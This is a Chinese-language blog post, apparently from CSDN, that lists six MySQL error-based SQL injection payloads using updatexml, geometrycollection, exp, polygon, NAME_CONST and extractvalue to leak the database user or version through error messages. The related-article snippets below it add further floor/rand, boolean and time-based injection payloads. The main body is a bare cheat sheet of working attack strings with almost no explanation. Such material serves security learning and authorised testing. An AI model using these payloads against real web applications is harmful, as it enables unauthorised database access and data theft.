SQL手工注入——报错注入的几个函数

最新推荐文章于 2023-05-05 11:46:55 发布
最新推荐文章于 2023-05-05 11:46:55 发布
阅读量601 收藏 2
点赞数
分类专栏: SQL注入 文章标签: web安全 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tony_jiajia/article/details/100123359
版权

1.通过updatexml

 

id=2 and 1=(updatexml(1,concat(0x3a,(select user() ) ),1))

 

2.通过geometrycollection语句

 

id=2 and geometrycollection((select * from(select * from (select user())a)b))

 

3.通过exp语句

 

id=2 and exp(~(select * from (select user() ) a));

 

4.通过polygon语句

 

id=2 and polygon((select * from (select * from (select user())a)b));

 

5.通过NAME_CONST报错:

 

and exists(select * from (select * from(select name_const(version(),0)a join (select name_const(version(),0))b)c);

 

6.通过extractvalue报错:

 

'or extractvalue (1, concat(0x5c,(select user()))) or'

 

 

 

gam0n
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL四大注入报错函数
weixin_44352521的博客
12-12 213
1. floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 2. extractvalue() id = 1 and (extractvalue(1, concat(0x5c,(sele...
mysql注入报错函数_sql注入 报错注入常用的三种函数
weixin_39834788的博客
02-02 1012
1.floor()函数报错原因是报错的原因是因为rand()函数在查询的时候会执行一次,插入的时候还会执行一次.这就是整个语句报错的关键前面说过floor(rand(0)*2) 前六位是0110110group by x先建立一个空表,用于分组.然后进行分组查询,第一次rand()执行,查询的结果是0,因为是空表所以插入这条,而插入的时候rand()又执行了一次,所以表的结果就是第一次执行完,接...
SQL注入之——基于函数报错手工注入(insert update delete)
温柔小薛的博客
04-02 1357
基于函数报错手工注入(insert update delete) 目录基于函数报错手工注入(insert update delete)基于函数报错注入常见攻击方法技巧思路背景条件基于报错的信息获取(三个常用的用来报错的函数)实战测试insert注入(注册信息使用函数)update注入(用于用户登陆端修改用户信息)delet注入(删除相关)遇到的问题 基于函数报错注入 常见攻击方法 updata...
SQL手工注入——报错注入利用
gam0n的博客
08-28 713
利用数据库的BUG进行利用,看报错信息,不过报错的信息就是我们想要的信息。 只要是count() rand group by 三个连用就会造成这种报错。 count用于判断数据库或表的数量,rand用于生成一个随机数,group by用于以什么为一组进行分组。 至少要有三条数据 才有可以产生报错注入。 floor(rand(0)*2))一定报错 语句: sele...
mysql报错注入手工方法
weixin_38023368的博客
09-04 429
以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过。这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩固复习。 总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面没有显示位,但是用echo mysql_error();输出了错误信息时使用。 公式具体如下 and(select 1 from(select count(*),concat((select (select (select concat.
sql注入详解
热门推荐
good good study
05-05 19万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
sql注入手工注入示例详解
09-10
之前和大家分享了基本的SQL注入的知识,这一篇讲的就是在得知注入点的之后,如何有效地进行脱裤。文章通过示例介绍的很详细,对大家的理解和学习很有帮助,下面来一起看看吧。
SQL注入——mssql注入
01-19
可以在 SQL Server 执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
phpaddslashes函数sql注入
10-25
主要介绍了phpaddslashes函数sql注入,实例讲述了采用addslashes函数对于sql注入的用处,对于PHP安全程序设计来说具有不错的参考借鉴价值,需要的朋友可以参考下
sql注入与转义的php函数代码
01-20
sql注入:  正常情况下:  delete.php?id=3; $sql = ‘delete from news where id = ‘.$_GET[‘id’];  恶意情况:  delete.php?id=3 or 1; $sql = ‘delete from news where id = 3 or 1’; ——-如此执行后,...
sql注入——报错注入
Night_time的博客
05-04 434
目录 一,报错注入的三个函数 1,updatexml()函数 2,extractvalue()函数 3,floor()函数 二,实战演练 练习环境:sqli-labs-master phpstudy sqli-labs-master(下载地址) :https://pan.baidu.com/s/1JBncmGsH3b1s4C6W-PwQQw 提取码:fnhj 一,报错注...
SQL手工注入sql注入判断)——东哥视频学习笔记
gam0n的博客
08-28 472
1.通过+-*/判断(INT型) 如 id=8+1 该方法只能针对int类型。 2.通过单引号/双引号闭合: 如 id=8' and 1=2 3.通过延时注入: 使用sleep()函数,判断是否有响应时间是否对应 步骤: 1.判断整型还是字符串 id=2 id='2' 2.若是整型不需要单引号闭合,字符串需要双引号闭合 3.闭合使用)’”来闭合 ...
白帽子阅读笔记——SQL注入
gam0n的博客
08-29 452
盲注:服务器没有错误回显时完成的注入攻击 利用了BENCHMARK()函数,该函数用于测试函数性能,利用该函数可以让同一个函数执行若干次,根据返回时间长短变化,判断是否执行成功 通过payload猜测出SQL的版本; 尽量数据库账号时,应该遵循”最小权限原则“ 如果要将文件读出后,将结果返回给攻击者,首先需要当前数据库用户有创建表的权限,首先通过LOAD_FILE()将系统文件读出,在通过...
东哥视频学习笔记——SQL手工注入之布尔注入
gam0n的博客
08-28 383
1.mid(str,1,3)字符串截取,从第一个字符截取,取三个字符,即从第一个字符到第三个字符 2.ORD()转换为ascii码 3.length()统计字节长度 4.version()查看数据库版本 5.database()查看数据库名 6.user()查看用户名 一、获取数据库名长度: 通过单引号闭合前面sql查询语句, username=111' or length(...
东哥视频学习笔记——SQL手工注入之延时注入
gam0n的博客
08-28 380
注入成功和失败返回的内容是一样的时候,应该使用延时注入; if语法: if(条件,True,False); Select * from admin where id = 1 and name = if(2>1,"1","2"); sleep(1); 一、获取数据库总数: select count(SCHEMA_NAME) from information_sc...
东哥视频学习笔记——SQL注入之联合注入
gam0n的博客
08-28 292
一、判断 通过单引号,判断是否能够注入,如' or 1=1等等 二、猜解字段 猜解字段,通过group by 和 order by 以及 union 查询进行判断 如一个表的字段有: id username password 可以通过上述方法进行查询 如: select * from admin where id = 1 order by 3 当3变为...
SQL手工注入sql注入防护)——东哥视频学习笔记
gam0n的博客
08-28 259
一、转义: 1.通过addslashes转义字符型注入 2.int型注入,通过获取到的变量加0 二、过滤: 过滤特殊字符,关键字等。
sql注入updatexml报错注入
最新发布
06-08
SQL注入是一种常见的安全漏洞,其updatexml是一种常用注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句执行失败。 2. 数据库对updatexml函数的支持不完整,某些版本的数据库可能不支持某些参数或功能,导致SQL语句执行失败。 3. 输入的注入payload不正确,可能造成语法错误或类型不匹配等问题,导致SQL语句执行失败。 为了解决这个问题,你可以尝试以下方法: 1. 检查SQL语句updatexml函数的使用是否正确,确保参数数量和类型正确。 2. 检查数据库版本和配置,确保数据库对updatexml函数的支持完整。 3. 检查输入的注入payload是否正确,可以使用工具或手动构造payload进行测试,找出问题所在。 此外,为了避免SQL注入安全漏洞,建议在编写代码时使用参数化查询,或对输入进行严格的过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值